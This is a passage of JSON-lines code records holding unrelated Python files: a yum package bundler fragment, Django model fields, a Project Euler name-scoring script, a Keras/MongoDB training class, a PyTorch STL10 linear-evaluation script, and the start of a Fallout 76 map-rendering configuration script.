def _get_package_name_from_fime(self, file_name):\n # http://ftp.rpm.org/max-rpm/ch-rpm-file-format.html\n # name-version-release.architecture.rpm\n return file_name[::-1].split('-', 2)[-1][::-1]\n","sub_path":"AppImageBuilder/app_dir/bundlers/yum/bundler.py","file_name":"bundler.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"182183756","text":"\nfrom django.db.models import EmailField\ntry:\n # from django_extensions.db.fields.json import JSONField\n raise ImportError\nexcept ImportError:\n import six\n from decimal import Decimal\n from django.db import models\n from django.conf import settings\n from django.core.serializers.json import DjangoJSONEncoder\n import json\n\n class JSONField(six.with_metaclass(models.SubfieldBase, models.TextField)):\n\n def __init__(self, *args, **kwargs):\n default = kwargs.get('default', None)\n if default is None:\n kwargs['default'] = '{}'\n elif isinstance(default, (list, dict)):\n kwargs['default'] = DjangoJSONEncoder().encode(default)\n models.TextField.__init__(self, *args, **kwargs)\n\n def to_python(self, value):\n if value is None or value == '':\n return {}\n elif isinstance(value, str) or isinstance(value, unicode):\n return json.loads(value, parse_float=Decimal, encoding=settings.DEFAULT_CHARSET)\n else:\n return value\n\n def get_db_prep_save(self, value, connection):\n #print value\n if not isinstance(value, (list, dict)):\n return super(JSONField, self).get_db_prep_save(\"\", connection=connection)\n else:\n return super(JSONField, self).get_db_prep_save(DjangoJSONEncoder().encode(value), connection=connection)\n\ntry:\n from south.modelsinspector import add_introspection_rules\n add_introspection_rules([], [\"^django_town\\.core\\.fields\\._EmailField\"])\n add_introspection_rules([], [\"^django_town\\.core\\.fields\\.JSONField\"])\nexcept ImportError:\n 
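In the YumBundler record above, run() ends with self._extract_packages_into_app_dir(app_dir_path), but app_dir_path is not defined anywhere in that method — it presumably should come from the config or a parameter. The exclusion logic, by contrast, is self-contained; a minimal sketch of the same first-glob-match-wins check (the EXCLUDES patterns are illustrative, not from the original config):

import fnmatch

EXCLUDES = ["glibc*", "*-devel"]

def is_excluded(pkg, patterns=EXCLUDES):
    """Mirror of YumBundler._is_excluded: any matching glob excludes."""
    return any(fnmatch.fnmatch(pkg, pat) for pat in patterns)

assert is_excluded("glibc-2.28") is True
assert is_excluded("zlib-devel") is True
assert is_excluded("bash") is False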
pass\n\n\nclass _EmailField(EmailField):\n\n def to_python(self, value):\n if value[0] == '#':\n return super(_EmailField, self).to_python(None)\n return super(_EmailField, self).to_python(value)\n\n def get_prep_value(self, value):\n return super(_EmailField, self).to_python(value)","sub_path":"django_town/core/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"283066612","text":"import urllib\n\ndic = {'a': 1,\n 'b': 2,\n 'c': 3,\n 'd': 4,\n 'e': 5,\n 'f': 6,\n 'g': 7,\n 'h': 8,\n 'i': 9,\n 'j': 10,\n 'k': 11,\n 'l': 12,\n 'm': 13,\n 'n': 14,\n 'o': 15,\n 'p': 16,\n 'q': 17,\n 'r': 18,\n 's': 19,\n 't': 20,\n 'u': 21,\n 'v': 22,\n 'w': 23,\n 'x': 24,\n 'y': 25,\n 'z': 26}\n\nurl = 'http://projecteuler.net/project/names.txt'\n\nuh = urllib.urlopen(url)\nsource = uh.read()\n\nsource = str(source)\nsource = source.replace('\\\"', '')\n\n\nlist = str(source).split(',')\nlist = sorted(list)\n\n\n\ndef score(name):\n scoreV = 0\n for i in range(len(name)):\n letter = name[i]\n letter = str(letter)\n letter = letter.lower()\n\n for key in dic:\n if letter == key:\n scoreV += dic[key]\n return scoreV\n\n\n\ntotal = 0\nfor v in range(len(list)):\n total += score(list[v]) * (v+1)\n\nprint(total)","sub_path":"euler/euler22.py","file_name":"euler22.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"454733894","text":"#!/usr/bin/env python3\n\n# @Author: George Onoufriou \n# @Date: 2018-07-02\n# @Filename: NeuralNetwork.py\n# @Last modified by: archer\n# @Last modified time: 2018-10-09\n# @License: Please see LICENSE file in project root\n\n\n\nimport pickle\nimport os, sys, pprint, copy\nimport pandas as pd\nimport numpy as np\nimport datetime\nfrom bson import objectid, Binary\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, LSTM\n\n\n\nclass NeuralNetwork():\n\n\n\n home = os.path.expanduser(\"~\")\n fileName = \"neuralNetwork\"\n prePend = \"[ \" + fileName + \" ] \"\n\n\n\n def __init__(self, db, data_pipeline, args, model_pipeline=None, logger=print):\n\n self.db = db\n self.args = args\n self.log = logger\n self.model = None\n self.cursor = None\n self.history = None\n self.sumError = None\n self.numExamples = None\n self.data_pipeline = data_pipeline\n self.model_pipeline = model_pipeline # can be None\n self.numValidExamples = None\n self.log(self.prePend + \"NN.init() success\", 3)\n self.model_dict = None\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(args[\"tfLogMin\"])\n\n\n\n def getCursor(self, pipeline=None, collName=None):\n\n if(self.cursor == None) or (pipeline != None):\n pipeline = pipeline if pipeline is not None else self.data_pipeline\n collName = collName if collName is not None else self.args[\"coll\"]\n self.db.connect()\n self.cursor = self.db.getData(pipeline=pipeline, collName=collName)\n # this is to allow a higher try catch to delete it\n return self.cursor\n else:\n self.log(prePend + \"could not generate cursor as cursor already exists or no pipeline is provided\", 1)\n\n\n\n def debug(self):\n self.log(self.prePend + \"\\n\" +\n \"\\tdb obj: \" + str(self.db) + \"\\n\" +\n \"\\tdb pipeline: \" + str(self.data_pipeline) + \"\\n\" +\n \"\\tdb cursor: \" + str(self.cursor) + \"\\n\" +\n \"\\tlogger: \" + str(self.log),\n 0)\n\n\n\n # automagic model generation\n def autogen(self):\n if(self.cursor != None):\n 
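Two small notes on the records just above. The JSONField/_EmailField module mixes Python 2-only names (unicode) into otherwise Python 3-style code, which would raise NameError on Python 3. And in the Project Euler 22 script, score() walks the whole a-z dictionary once per letter; ord() gives the alphabetical value directly. A self-contained sketch (307 is the total for this toy three-name list, computed by hand):

def name_score(name):
    """Sum of alphabetical values: 'a'/'A' -> 1 ... 'z'/'Z' -> 26."""
    return sum(ord(ch) - ord('a') + 1 for ch in name.lower() if ch.isalpha())

assert name_score("COLIN") == 53        # the worked example from Euler 22

names = sorted(["MARY", "COLIN", "ANNA"])
print(sum((i + 1) * name_score(n) for i, n in enumerate(names)))   # -> 307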
self.generateModel()\n self.compile()\n\n\n\n #TODO: check this through yet untested\n def getModel(self):\n self.make_keras_picklable()\n\n query={}\n if(self.model_pipeline != None):\n query=self.model_pipeline\n\n self.log(self.prePend + \"query is: \" + str(query), 0)\n\n # attempt to get model using cursor\n model_cursor = self.db.getMostRecent(query=query, collName=self.args[\"modelColl\"])\n\n if(model_cursor != None):\n model_metadata = pd.DataFrame(list(model_cursor))\n self.model_dict = model_metadata.to_dict('records')\n del self.model_dict[0][\"model_bin\"] # no one wants to see the binary\n self.log(self.prePend + \"Loading model:\",0)\n pprint.pprint(self.model_dict)\n model_bin = dict(model_metadata['model_bin'])[0]\n self.model = pickle.loads(model_bin)\n self.compile()\n else:\n self.log(self.prePend + \"could not get model cursor from database: \", 2)\n\n\n\n def generateModel(self):\n if( \"lstm\" == self.args[\"type\"]):\n self.model = self.lstm()\n elif(\"rnn\" == self.args[\"type\"]):\n self.model = self.rnn()\n\n\n\n def compile(self):\n if(self.model != None):\n self.model.compile(optimizer=self.args[\"optimizer\"], loss=self.args[\"lossMetric\"])\n else:\n print(\"No model to compile, can not NN.compile()\", 1)\n\n\n\n def lstm(self):\n model = Sequential()\n #TODO: off by one error please for the love of god george\n bInShape = (1, self.args[\"timeSteps\"], self.args[\"dimensionality\"])\n\n self.log(\n self.prePend + \"\\n\" +\n \"\\t\" + \"type:\\t\\t\" + str(self.args[\"type\"]) + \"\\n\" +\n \"\\t\" + \"layers:\\t\\t\" + str(self.args[\"layers\"]) + \"\\n\" +\n \"\\t\" + \"timesteps:\\t\" + str(self.args[\"timeSteps\"]) + \"\\n\" +\n \"\\t\" + \"dimensionality:\\t\" + str(self.args[\"dimensionality\"]) + \"\\n\" +\n \"\\t\" + \"batchSize:\\t\" + str(self.args[\"batchSize\"]) + \"\\n\" +\n \"\\t\" + \"batchInShape:\\t\" + str(bInShape) + \"\\n\" +\n \"\\t\" + \"epochs:\\t\\t\" + str(self.args[\"epochs\"]) + \"\\n\" +\n \"\\t\" + \"epochs_chunk:\\t\" + str(self.args[\"epochs_chunk\"]) + \"\\n\" +\n \"\\t\" + \"activation:\\t\" + str(self.args[\"activation\"]) + \"\\n\",\n 0\n )\n\n # gen layers\n for unused in range(self.args[\"layers\"]-1):\n model.add(LSTM(self.args[\"intLayerDim\"], activation=self.args[\"activation\"], return_sequences=True, batch_input_shape=bInShape))\n model.add(LSTM(self.args[\"intLayerDim\"], activation=self.args[\"activation\"], batch_input_shape=bInShape))\n model.add(Dense(1))\n self.log(self.prePend + \"LSTM created\", -1)\n return model\n\n\n\n def rnn(self):\n model = Sequential()\n\n self.log(\n self.prePend + \"\\n\" +\n \"\\t\" + \"type:\\t\\t\" + str(self.args[\"type\"]) + \"\\n\" +\n \"\\t\" + \"layers:\\t\\t\" + str(self.args[\"layers\"]) + \"\\n\" +\n \"\\t\" + \"timesteps:\\t\" + str(self.args[\"timeSteps\"]) + \"\\n\" +\n \"\\t\" + \"dimensionality:\\t\" + str(self.args[\"dimensionality\"]) + \"\\n\" +\n \"\\t\" + \"epochs:\\t\\t\" + str(self.args[\"epochs\"]) + \"\\n\" +\n \"\\t\" + \"activation:\\t\" + str(self.args[\"activation\"]) + \"\\n\",\n 0\n )\n\n # gen layers\n for unused in range(self.args[\"layers\"]): # don't need to use iterator just pure loop\n model.add(Dense(self.args[\"timeSteps\"],\n input_dim=self.args[\"dimensionality\"],\n activation=self.args[\"activation\"]))\n model.add(Dense(1)) # this dense 1 is the output layer since this is regression\n self.log(self.prePend + \"RNN created\", -1)\n return model # if nothing errored now we can assign model\n\n\n\n #TODO: this should be in mongodb class 
itself\n def nextDataset(self, batchSize=1):\n data = []\n try:\n # setting batchSize on cursor seems to do nothing\n for unused in range(batchSize):\n document = self.cursor.next()\n data.append(document)\n except StopIteration:\n self.log(\"cursor has been emptied\", -1)\n except ValueError:\n self.log(\"Value Error: please make sure that something other than \\\n plain values are returned by your pipeline e.g include an array \\\n of objects then check the following error:\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]) , 2)\n except:\n self.log(self.prePend + \"could not get next data point from mongodb:\\n\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]) , 2)\n return data\n\n\n\n def train(self):\n self.modler(toTrain=True)\n self.saveModel()\n\n\n\n def test(self):\n if(self.model):\n self.log(self.prePend + \"model already in memory using it for testing\", 3)\n else:\n self.log(self.prePend + \"model not already in memory attempting retrieval\", 3)\n self.getModel()\n if(self.args[\"testColl\"] != \"\"):\n\n args = copy.deepcopy(self.args)\n cursor = None\n args[\"coll\"] = args[\"testColl\"]\n args[\"testColl\"] = \"\"\n try:\n nn = NeuralNetwork(db=self.db,\n logger=self.log,\n args=args,\n data_pipeline=self.data_pipeline,\n model_pipeline=self.model_pipeline,\n )\n cursor = nn.getCursor()\n nn.test()\n\n except:\n print(self.prePend + \"could not test on test dataset:\\n\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]), 2)\n finally:\n if(cursor != None) and (cursor.alive):\n cursor.close()\n else:\n self.log(self.prePend + \" Recursive neural network call; coll: \" + self.args[\"coll\"] + \" testColl:\" + self.args[\"testColl\"])\n self.modler(toTest=True)\n self.saveResult()\n\n\n\n def predict(self):\n if(self.model):\n self.log(self.prePend + \"model already in memory using it for testing\", 3)\n else:\n self.log(self.prePend + \"model not already in memory attempting retrieval\", 3)\n self.getModel()\n self.modler(toPredict=True)\n\n\n\n # the universal interface that allows the code of both test and train to be\n # one single set. 
\"Don't repeat yourself\"\n def modler(self, toTrain=False, toTest=False, toPredict=False):\n sumError = 0\n numExamples = 0\n self.numValidExamples = 0\n\n\n # check if model exists and that cursor exists\n if(self.model) and (self.cursor):\n\n if(toTrain == True):\n self.log(\"training on \" + self.args[\"coll\"] + \" ...\" , -1)\n elif(toTest == True):\n self.log(\"testing on \" + self.args[\"coll\"] + \" ...\" , -1)\n elif(toPredict == True):\n self.log(\"predicting on \" + self.args[\"coll\"] + \" ...\" , -1)\n\n # keep looping while cursor can give more data\n while(self.cursor.alive):\n dataBatch = self.nextDataset(1)\n for mongoDoc in dataBatch:\n numExamples = numExamples + 1\n\n #TODO this is fine if both are pushed lists\n data = pd.DataFrame(list(mongoDoc[\"data\"]))\n if(self.args[\"type\"] == \"rnn\"):\n data = data.values\n else:\n data = np.expand_dims(data.values, axis=0)\n\n #TODO needs generalisation for many to many or one to many\n target = mongoDoc[\"target\"]\n target = np.full((1, 1), target)\n\n if(toTrain == True):\n self.testTrainer(data=data, target=target,\n id=mongoDoc[\"_id\"], toTrain=True)\n elif(toTest == True):\n try:\n sumError = sumError + self.testTrainer(data=data,\n target=target, id=mongoDoc[\"_id\"], toTrain=False)\n except TypeError:\n self.log(\"NN.testTrainer returned nothing\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]), 3)\n elif(toPredict == True):\n self.predictor(data=data, id=mongoDoc[\"_id\"], target=target if target is not None else None)\n\n if(toTrain == True):\n # cursor is now dead so make it None\n self.cursor = None\n # since this is training we need training accuracy so need to regen cursor\n self.getCursor()\n # call self again but to test now\n self.modler(toTest=True, toTrain=False)\n elif(toTest == True):\n self.sumError = sumError\n self.numExamples = numExamples\n self.modlerStatusMessage()\n\n elif(toPredict == True):\n None\n else:\n if(toTrain == True):\n self.log(self.prePend +\n \"could not train, either model not generated or cursor does not exist\"\n , 2)\n\n else:\n self.log(self.prePend +\n \"Aborting test model does not exist; unable to continue\"\n , 2)\n\n def modlerStatusMessage(self):\n self.log(self.prePend +\n \"\\n\\tsumError: \" + str(self.sumError) +\n \" \\n\\tnumExamples: \" + str(self.numExamples) +\n \" \\n\\tnumValidExamples \" + str(self.numValidExamples) +\n \" \\n\\tmeanError: \" + str(self.sumError / self.numValidExamples),\n 0)\n\n\n def testTrainer(self, data, target, id, toTrain=False):\n try:\n #TODO: off by one ... 
you fool george, sort this out\n if(self.args[\"type\"] == \"rnn\"):\n target = np.full((self.args[\"timeSteps\"], 1), target)\n expectShape = (self.args[\"timeSteps\"], self.args[\"dimensionality\"])\n else:\n expectShape = (1, self.args[\"timeSteps\"], self.args[\"dimensionality\"])\n\n # check if shape meets expectations\n if(data.shape == expectShape):\n\n if(toTrain == True):\n # self.model.summary()\n self.model.fit(x=data, y=target, batch_size=self.args[\"batchSize\"],\n epochs=self.args[\"epochs_chunk\"], verbose=self.args[\"kerLogMax\"],\n callbacks=None, validation_split=0, validation_data=None,\n shuffle=True, class_weight=None, sample_weight=None,\n initial_epoch=0, steps_per_epoch=None, validation_steps=None)\n else:\n self.numValidExamples = self.numValidExamples + 1\n return self.model.evaluate(x=data, y=target,\n batch_size=self.args[\"batchSize\"],\n verbose=self.args[\"kerLogMax\"])\n\n else:\n self.log(self.prePend + str(id) + \" \" + str(data.shape) + \" != \"\n + str(expectShape), 1)\n return 0\n\n except:\n if(self.args[\"toTrain\"]): # falling back to args directly just incase is something on the way fked up\n self.log(self.prePend + \"could not train:\\t\" + str(id) + \"\\n\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]), 2)\n else:\n self.log(self.prePend + \"could not test:\\t\" + str(id) + \"\\n\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]), 2)\n\n\n\n def predictor(self, data, id, target=None):\n try:\n #TODO: off by one ... you fool george, sort this out\n if(self.args[\"type\"] == \"rnn\"):\n target = np.full((self.args[\"timeSteps\"], 1), target)\n expectShape = (self.args[\"timeSteps\"], self.args[\"dimensionality\"])\n else:\n expectShape = (1, self.args[\"timeSteps\"], self.args[\"dimensionality\"])\n\n # check if shape meets expectations\n if(data.shape == expectShape):\n if(target != None):\n self.log(\"targ: \" + str(target) + \" \" + str(id), 3)\n\n x = self.model.predict(x=data, batch_size=self.args[\"batchSize\"],\n verbose=self.args[\"kerLogMax\"])\n self.log(\"pred: \" + str(x), 0)\n\n else:\n self.log(self.prePend + str(id) + \" \" + str(data.shape) + \" != \"\n + str(expectShape), 1)\n return -1\n\n except:\n self.log(self.prePend + \"could not predict:\\t\" + str(id) + \"\\n\" +\n str(sys.exc_info()[0]) + \" \" +\n str(sys.exc_info()[1]), 2)\n\n\n\n def saveModel(self):\n if(self.model != None):\n stateDict = self.args\n stateDict[\"pipe\"] = str(self.data_pipeline)\n del stateDict[\"pass\"]\n stateDict[\"utc\"] = datetime.datetime.utcnow()\n if(self.sumError):\n stateDict[\"sumError\"] = self.sumError\n if(self.numExamples):\n stateDict[\"numSamples\"] = self.numExamples\n if(self.numValidExamples):\n stateDict[\"numValidSamples\"] = self.numValidExamples\n if(self.sumError) and (self.numValidExamples):\n stateDict[\"meanError\"] = self.sumError / self.numValidExamples\n\n # save model\n self.make_keras_picklable()\n model_bytes = pickle.dumps(self.model)\n stateDict['model_bin'] = Binary(model_bytes)\n self.db.shoveJson(stateDict, collName=str(self.args[\"modelColl\"]))\n\n\n\n def saveResult(self, coll=None):\n if(self.model != None):\n stateDict = self.args\n stateDict[\"desc\"] = \"test\"\n stateDict[\"pipe\"] = str(self.data_pipeline)\n try:\n del stateDict[\"pass\"]\n except:\n pass\n stateDict[\"utc\"] = datetime.datetime.utcnow()\n if(self.sumError):\n stateDict[\"sumError\"] = self.sumError\n if(self.numExamples):\n stateDict[\"numSamples\"] = self.numExamples\n if(self.numValidExamples):\n 
stateDict[\"numValidSamples\"] = self.numValidExamples\n if(self.sumError) and (self.numValidExamples):\n stateDict[\"meanError\"] = self.sumError / self.numValidExamples\n if(self.model_dict != None):\n stateDict[\"utc\"] = datetime.datetime.utcnow()\n stateDict[\"modelId\"] = self.model_dict[0][\"_id\"]\n self.db.shoveJson(stateDict, collName=str(\"esperiment\"))\n\n\n\n def make_keras_picklable(self):\n import tempfile\n import keras.models\n import h5py\n\n def __getstate__(self):\n model_str = \"\"\n with tempfile.NamedTemporaryFile(suffix='.hdf5', delete=True) as fd:\n keras.models.save_model(self, fd.name, overwrite=True)\n model_str = fd.read()\n d = { 'model_str': model_str }\n return d\n\n def __setstate__(self, state):\n with tempfile.NamedTemporaryFile(suffix='.hdf5', delete=True) as fd:\n fd.write(state['model_str'])\n fd.flush()\n model = keras.models.load_model(fd.name)\n self.__dict__ = model.__dict__\n\n cls = keras.models.Model\n cls.__getstate__ = __getstate__\n cls.__setstate__ = __setstate__\n","sub_path":"src/neuralNetwork.py","file_name":"neuralNetwork.py","file_ext":"py","file_size_in_byte":18472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"381812389","text":"import argparse\nimport torch\nfrom torch import optim\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import STL10\nfrom tqdm import tqdm\nimport utils\nfrom network import Network\n\n\ndef train_test(net, data_loader, training_optimizer):\n is_train = training_optimizer is not None\n\n if is_train:\n net.train()\n else:\n net.eval()\n\n total_loss = 0\n total_correct_1 = 0\n total_correct_5 = 0\n total_num = 0\n data_progress = tqdm(data_loader)\n with (torch.enable_grad() if is_train else torch.no_grad()):\n for data, target in data_progress:\n data, target = data.cuda(non_blocking=True), target.cuda(non_blocking=True)\n out = net(data)\n loss = loss_criterion(out, target)\n\n if is_train:\n training_optimizer.zero_grad()\n loss.backward()\n training_optimizer.step()\n\n total_num += data.size(0)\n total_loss += loss.item() * data.size(0)\n prediction = torch.argsort(out, dim=-1, descending=True)\n total_correct_1 += torch.sum((prediction[:, 0:1] == target.unsqueeze(dim=-1)).any(dim=-1).float()).item()\n total_correct_5 += torch.sum((prediction[:, 0:5] == target.unsqueeze(dim=-1)).any(dim=-1).float()).item()\n\n data_progress.set_description('{} Epoch: [{}/{}] Loss: {:.4f} ACC@1: {:.2f}% ACC@5: {:.2f}%'\n .format('Train' if is_train else 'Test', epoch, epochs, total_loss / total_num,\n total_correct_1 / total_num * 100, total_correct_5 / total_num * 100))\n\n return total_loss / total_num, total_correct_1 / total_num * 100, total_correct_5 / total_num * 100\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Linear Evaluation')\n parser.add_argument('--model_path', type=str, default='results/model_400.pth',\n help='The pretrained model path')\n parser.add_argument('--batch_size', type=int, default=512, help='Number of images in each mini-batch')\n parser.add_argument('--epochs', type=int, default=100, help='Number of sweeps over the dataset to train')\n\n args = parser.parse_args()\n model_path, batch_size, epochs = args.model_path, args.batch_size, args.epochs\n train_data = STL10(root='data', split='train', transform=utils.train_transform)\n train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=True, num_workers=2, pin_memory=True)\n test_data = STL10(root='data', 
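The NeuralNetwork record above leans heavily on bare except: blocks that log and continue, and modlerStatusMessage divides by self.numValidExamples, which is zero whenever every example failed the shape check — a ZeroDivisionError waiting in the status line. A sketch of the cursor-batching helper at the heart of nextDataset, stopping quietly only on genuine exhaustion (next_batch is an illustrative name; pymongo cursors support the built-in next()):

def next_batch(cursor, batch_size=1):
    """Pull up to batch_size documents; stop at the end of the cursor."""
    batch = []
    for _ in range(batch_size):
        try:
            batch.append(next(cursor))
        except StopIteration:
            break
    return batch

# Works with any iterator, so it is testable without MongoDB:
assert next_batch(iter([{"a": 1}, {"a": 2}]), 5) == [{"a": 1}, {"a": 2}]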
split='test', transform=utils.test_transform)\n test_loader = DataLoader(test_data, batch_size=batch_size, shuffle=False, num_workers=2, pin_memory=True)\n\n model = Network(num_class=len(train_data.classes), pretrained_path=model_path).cuda()\n for param in model.layer.parameters():\n param.requires_grad = False\n model = nn.DataParallel(model)\n\n adam = optim.Adam(model.module.fc.parameters(), lr=1e-3, weight_decay=1e-6)\n loss_criterion = nn.CrossEntropyLoss()\n results = {'train_loss': [], 'train_acc@1': [], 'train_acc@5': [],\n 'test_loss': [], 'test_acc@1': [], 'test_acc@5': []}\n\n for epoch in range(1, epochs + 1):\n train_loss, train_acc_1, train_acc_5 = train_test(model, train_loader, adam)\n test_loss, test_acc_1, test_acc_5 = train_test(model, test_loader, None)\n","sub_path":"linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"476894016","text":"#!/usr/bin/python3\n\nimport os, sys, subprocess\n\nmipLevel = 1 # resolution is 2 ^ (7 - mipLevel) per cell\nresizeOutput = \"100x100%\"\ncellRange = [-70, -70, 70, 70] # xMin, yMin, xMax, yMax\nwaterColor = 0x60002030 # A7R8G8B8\njpegQuality = 80\nenableIsometric = False\nenableMarkers = not enableIsometric and True # does not work in isometric\nmarkerAlpha = 75 # percents\nuseAdditionalMarkers = False\nenableTexture = True\ntextureMip = 4.0 # 5.0\ntextureBrightness = 1.2\nterrainBrightness = 125\nenableGCVR = False\n# enable these to save time if all the data is already extracted and up to date\nnoExtractIcons = False # do not extract map marker icons\nnoExtractTextures = False # do not extract land textures\nnoExtractTerrain = False # do not extract terrain from Appalachia.btd\nmarkerDefFileName = \"fo76icondefs.txt\"\n# SWFTools from http://www.swftools.org/download.html\nswfToolsPath = \"Program Files (x86)/SWFTools\"\n\nadditionalMarkerDefs = [[0x003BD4F4, 2, 0x3E000000, 1.0, 1]]\nadditionalMarkerDefs += [[0x003BD4F4, 2, \"interface/fo76icon_1e.dds\", 0.5, 1]]\n\nif useAdditionalMarkers:\n additionalMarkerDefs += [[0x0035D223, 2, 0x4FFF4020, 3.0, 1]]\n additionalMarkerDefs += [[0x0035D238, 2, 0x4FFF4020, 3.0, 1]]\n\nif \"win\" in sys.platform:\n imageMagickPath = \"C:/Program Files/ImageMagick-7.1.0-Q16-HDRI/magick.exe\"\n baunpackPath = \"./baunpack.exe\"\n fo76Path = \"D:/SteamLibrary/steamapps/common/Fallout76/Data\"\nelse:\n imageMagickPath = \"/usr/bin/magick\"\n baunpackPath = \"./baunpack\"\n fo76Path = \"./Fallout76/Data\"\n winePath = \"/usr/bin/wine\"\n\ndef runCmd(args):\n tmpArgs = []\n for i in args:\n tmpArgs += [str(i)]\n if not \"/\" in tmpArgs[0]:\n tmpArgs[0] = \"./\" + tmpArgs[0]\n subprocess.run(tmpArgs)\n\ndef findArchives(path, pattern = \"\"):\n fileList = []\n d = os.scandir(path)\n try:\n while True:\n fileName = d.__next__().name\n tmpName = fileName.lower()\n if pattern and not pattern in tmpName:\n continue\n if tmpName.endswith(\".bsa\") or tmpName.endswith(\".ba2\"):\n fileList += [path + \"/\" + fileName]\n except:\n pass\n return fileList\n\niconList = [ [ 0x0000, 386, \"cave\" ],\n [ 0x0001, 382, \"city\" ],\n [ 0x0002, 358, \"camp\" ],\n [ 0x0003, 301, \"factory\" ],\n [ 0x0004, 253, \"Sugarmaple\" ],\n [ 0x0006, 259, \"military\" ],\n [ 0x0007, 287, \"mountains\" ],\n [ 0x0008, 231, \"building\" ],\n [ 0x0009, 109, \"ruins\", \"200,200\" ],\n [ 0x000B, 180, \"monument\" ],\n [ 0x000C, 172, \"settlement\" ],\n [ 0x000D, 170, \"sewers\" ],\n [ 0x000E, 85, \"vault\" 
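The linear-evaluation record above computes top-1/top-5 accuracy via argsort on the logits. That idiom is easy to get wrong, so here is the same check isolated into a small function with a toy verification (topk_correct is an illustrative name; it assumes torch is available, as the record does):

import torch

def topk_correct(logits, target, k):
    """Count rows whose target class is among the k highest logits."""
    pred = torch.argsort(logits, dim=-1, descending=True)[:, :k]
    return (pred == target.unsqueeze(-1)).any(dim=-1).sum().item()

logits = torch.tensor([[0.1, 0.9, 0.0],
                       [0.8, 0.1, 0.1]])
target = torch.tensor([1, 2])
assert topk_correct(logits, target, 1) == 1   # only row 0 is right at top-1
assert topk_correct(logits, target, 3) == 2   # both are right at top-3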
],\n [ 0x000F, 414, \"airport\" ],\n [ 0x0011, 390, \"dirt track\" ],\n [ 0x0012, 384, \"church\" ],\n [ 0x0013, 378, \"golf club\" ],\n [ 0x0016, 360, \"highway\" ],\n [ 0x0017, 352, \"farm\" ],\n [ 0x0018, 348, \"Red Rocket\" ],\n [ 0x0019, 343, \"forest\" ],\n [ 0x001A, 341, \"institutional\" ],\n [ 0x001B, 339, \"cemetery\" ],\n [ 0x001C, 333, \"hospital\" ],\n [ 0x001D, 303, \"chemical\" ],\n [ 0x001E, 125, \"workshop\" ],\n [ 0x0021, 289, \"junkyard\" ],\n [ 0x0023, 223, \"pier\" ],\n [ 0x0024, 211, \"pond / lake\" ],\n [ 0x0025, 196, \"mine\" ],\n [ 0x0026, 190, \"disposal site\" ],\n [ 0x0027, 188, \"relay tower\" ],\n [ 0x002D, 111, \"town\" ],\n [ 0x002E, 404, \"Fort Atlas\", \"152,192\" ],\n [ 0x002F, 400, \"business\" ],\n [ 0x0030, 398, \"bunker\" ],\n [ 0x0031, 388, \"Prickett's Fort\" ],\n [ 0x0033, 168, \"Portside Pub\" ],\n [ 0x0034, 277, \"low rise\" ],\n [ 0x0036, 74, \"player camp\" ],\n [ 0x0038, 182, \"railroad\" ],\n [ 0x0039, 178, \"satellite array\" ],\n [ 0x003D, 186, \"raider camp\" ],\n [ 0x0040, 107, \"train station\" ],\n [ 0x0041, 362, \"power substation\" ],\n [ 0x0042, 346, \"fissure site\" ],\n [ 0x0043, 95, \"Vault 63\" ],\n [ 0x0044, 93, \"Vault 76\" ],\n [ 0x0045, 89, \"Vault 94\" ],\n [ 0x0046, 87, \"Vault 96\" ],\n [ 0x0047, 412, \"amusement park\", \"256,368\" ],\n [ 0x0048, 275, \"mansion\", \"368,280\" ],\n [ 0x0049, 408, \"Arktos Pharma\", \"256,144\", \"336,80\", \"352,48\" ],\n [ 0x004A, 209, \"power plant\", \"160,256\", \"160,320\", \"112,352\" ],\n [ 0x004B, 166, \"ski resort\", \"240,344\", \"288,344\" ],\n [ 0x004C, 410, \"App. Antiques\" ],\n [ 0x004D, 115, \"The Giant Teapot\" ],\n [ 0x004E, 416, \"agricult. center\" ],\n [ 0x004F, 77, \"shack\" ],\n [ 0x0050, 331, \"trailer\", \"224,112\", \"288,112\" ],\n [ 0x0051, 279, \"lookout\", \"192,128\" ],\n [ 0x0052, 229, \"overlook\" ],\n [ 0x0053, 198, \"Pumpkin House\" ],\n [ 0x0054, 376, \"cafe\" ],\n [ 0x0055, 396, \"cabin\" ],\n [ 0x0056, 105, \"trainyard\" ],\n [ 0x0057, 392, \"capitol\" ],\n [ 0x0058, 335, \"hi-tech building\" ],\n [ 0x0059, 281, \"lighthouse\" ],\n [ 0x005A, 356, \"Mount Blair\" ],\n [ 0x005C, 225, \"P. 
